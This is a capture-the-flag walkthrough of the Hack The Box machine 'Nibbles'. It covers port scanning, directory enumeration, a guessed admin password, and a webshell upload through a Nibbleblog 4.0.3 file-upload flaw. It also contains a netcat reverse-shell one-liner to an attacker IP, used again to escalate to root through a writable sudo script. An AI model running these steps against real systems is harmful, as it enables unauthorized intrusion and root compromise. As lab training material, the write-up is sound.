HTB - Nibbles
Getting Root
We notice that the application is running Nibble-blog version 4.0.3 which is vulnerable to file upload
We upload a webshell and get access to the box as user nibbler who has full sudo access to a bash script on his home directory
Tools Used:
nmap, dirsearch, searchploit,
Nmap
nmap -sC -sV -p- -oA nmap/allports 10.10.10.75
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-13 21:50 EDT
Nmap scan report for 10.10.10.75
Host is up (0.061s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Enumeration
Dirsearch
sudo dirsearch -u http://10.10.10.75/nibbleblog -E
_|. _ _ _ _ _ _|_ v0.3.9
(_||| _) (/_(_|| (_| )
Extensions: php, asp, aspx, jsp, js, html, do, action | HTTP method: get | Threads: 10 | Wordlist size: 8674
Error Log: /opt/dirsearch/logs/errors-20-04-13_21-56-23.log
Target: http://10.10.10.75/nibbleblog
[21:56:23] Starting:
[21:56:25] 403 - 308B - /nibbleblog/.ht_wsr.txt
[21:56:25] 403 - 301B - /nibbleblog/.hta
[21:56:25] 403 - 310B - /nibbleblog/.htaccess-dev
[21:56:25] 403 - 312B - /nibbleblog/.htaccess-local
[21:56:25] 403 - 312B - /nibbleblog/.htaccess-marco
[21:56:25] 403 - 310B - /nibbleblog/.htaccess.BAK
[21:56:25] 403 - 311B - /nibbleblog/.htaccess.bak1
[21:56:25] 403 - 310B - /nibbleblog/.htaccess.old
[21:56:25] 403 - 311B - /nibbleblog/.htaccess.orig
[21:56:25] 403 - 313B - /nibbleblog/.htaccess.sample
[21:56:25] 403 - 311B - /nibbleblog/.htaccess.save
[21:56:25] 403 - 310B - /nibbleblog/.htaccess.txt
[21:56:25] 403 - 312B - /nibbleblog/.htaccess_extra
[21:56:25] 403 - 311B - /nibbleblog/.htaccess_orig
[21:56:25] 403 - 309B - /nibbleblog/.htaccess_sc
[21:56:25] 403 - 309B - /nibbleblog/.htaccessBAK
[21:56:25] 403 - 309B - /nibbleblog/.htaccessOLD
[21:56:25] 403 - 310B - /nibbleblog/.htaccessOLD2
[21:56:25] 403 - 307B - /nibbleblog/.htaccess~
[21:56:25] 403 - 305B - /nibbleblog/.htgroup
[21:56:25] 403 - 310B - /nibbleblog/.htpasswd-old
[21:56:25] 403 - 311B - /nibbleblog/.htpasswd_test
[21:56:25] 403 - 307B - /nibbleblog/.htpasswds
[21:56:25] 403 - 305B - /nibbleblog/.htusers
[21:56:31] 301 - 321B - /nibbleblog/admin -> http://10.10.10.75/nibbleblog/admin/
[21:56:31] 200 - 1KB - /nibbleblog/admin.php
[21:56:31] 200 - 2KB - /nibbleblog/admin/
[21:56:32] 403 - 312B - /nibbleblog/admin/.htaccess
[21:56:32] 200 - 2KB - /nibbleblog/admin/?/login
[21:56:32] 301 - 332B - /nibbleblog/admin/js/tinymce -> http://10.10.10.75/nibbleblog/admin/js/tinymce/
[21:56:32] 200 - 2KB - /nibbleblog/admin/js/tinymce/
[21:56:50] 301 - 323B - /nibbleblog/content -> http://10.10.10.75/nibbleblog/content/
[21:56:57] 200 - 3KB - /nibbleblog/index.php
[21:56:57] 200 - 3KB - /nibbleblog/index.php/login/
[21:56:57] 200 - 78B - /nibbleblog/install.php
[21:56:58] 301 - 325B - /nibbleblog/languages -> http://10.10.10.75/nibbleblog/languages/
[21:56:59] 200 - 34KB - /nibbleblog/LICENSE.txt
[21:57:06] 301 - 323B - /nibbleblog/plugins -> http://10.10.10.75/nibbleblog/plugins/
[21:57:08] 200 - 5KB - /nibbleblog/README
[21:57:14] 301 - 322B - /nibbleblog/themes -> http://10.10.10.75/nibbleblog/themes/
Task CompletedThe interesting stuff:
[21:56:31] 200 - 1KB - /nibbleblog/admin.php
[21:56:50] 301 - 323B - /nibbleblog/content http://10.10.10.75/nibbleblog/content/
[21:57:08] 200 - 5KB - /nibbleblog/README
# Found under
http://10.10.10.75/nibbleblog/README
====== Nibbleblog ======
Version: v4.0.3
Codename: Coffee
Release date: 2014-04-01
# Found under
http://10.10.10.75/nibbleblog/content/private/users.xml
Username: admin
( see screeshot below)Checking the admin page, we were able to guess the password.
# On the admin page
Username: admin
Password: nibbles
# Discovered the creds by guessing
http://10.10.10.75/nibbleblog/admin.phpSearchsploit
searchsploit Nibbleblog
----------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
----------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Nibbleblog 3 - Multiple SQL Injections | exploits/php/webapps/35865.txt
Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit) | exploits/php/remote/38489.rb
----------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------Exploit
We find an exploit for our version but using metasploit, however a simple google search takes use to the following POC
3. Proof of Concept
Obtain Admin credentials (for example via Phishing via XSS which can be gained via CSRF, see advisory about CSRF in NibbleBlog 4.0.3)
Activate My image plugin by visiting http://localhost/nibbleblog/admin.php?controller=plugins&action=install&plugin=my_image
Upload PHP shell, ignore warnings
Visit http://localhost/nibbleblog/content/private/plugins/my_image/image.php. This is the default name of images uploaded via the plugin.
According to the POC we should be able to upload a php file under the My Image plugin and ignore all the warnings. In order to do to do this we must be able to login to the admin page.
We know the user admin, but we don't have a password. A few manual login tries and we can guess the password as nibbles. Now we can attempt to upload our php webshell.
Upload the webshell
We noticed the warnings and ignore them
Visiting the following page as described by the POC takes to the webshell
http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.phpWe execute the following to get a reverse shell on the box
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.38 9001>/tmp/fPrivilege Escalation
# Checking sudo permissions, we should be able to run a bash script with sudo
nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ sudo -l
<ml/nibbleblog/content/private/plugins/my_image$ sudo -l
sudo: unable to resolve host Nibbles: Connection timed out
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
'(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh'
# Checking the dircetory of the file
nibbler@Nibbles:/home/nibbler$ ls -la
ls -la
total 20
drwxr-xr-x 3 nibbler nibbler 4096 Dec 29 2017 .
drwxr-xr-x 3 root root 4096 Dec 10 2017 ..
-rw------- 1 nibbler nibbler 0 Dec 29 2017 .bash_history
drwxrwxr-x 2 nibbler nibbler 4096 Dec 10 2017 .nano
-r-------- 1 nibbler nibbler 1855 Dec 10 2017 personal.zip
-r-------- 1 nibbler nibbler 33 Dec 10 2017 user.txt
# we dont see the personal directory but we see a zip file
nibbler@Nibbles:/home/nibbler$ unzip personal.zip
unzip personal.zip
Archive: personal.zip
creating: personal/
creating: personal/stuff/
inflating: personal/stuff/monitor.sh
# We can see we have full permissions of the bash script
nibbler@Nibbles:/home/nibbler/personal/stuff$ ls -la
ls -la
total 12
drwxr-xr-x 2 nibbler nibbler 4096 Dec 10 2017 .
drwxr-xr-x 3 nibbler nibbler 4096 Dec 10 2017 ..
-rwxrwxrwx 1 nibbler nibbler 4015 May 8 2015 monitor.sh
# Edited the bash scrip with the following contents
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.38 9002>/tmp/f' > monitor.sh
# Executed the script with sudo
nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo /home/nibbler/personal/stuff/monitor.sh
# Got a shell as root
rlwrap nc -lnvp 9002
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9002
Ncat: Listening on 0.0.0.0:9002
Ncat: Connection from 10.10.10.75.
Ncat: Connection from 10.10.10.75:45840.
# id
uid=0(root) gid=0(root) groups=0(root)
# Last updated
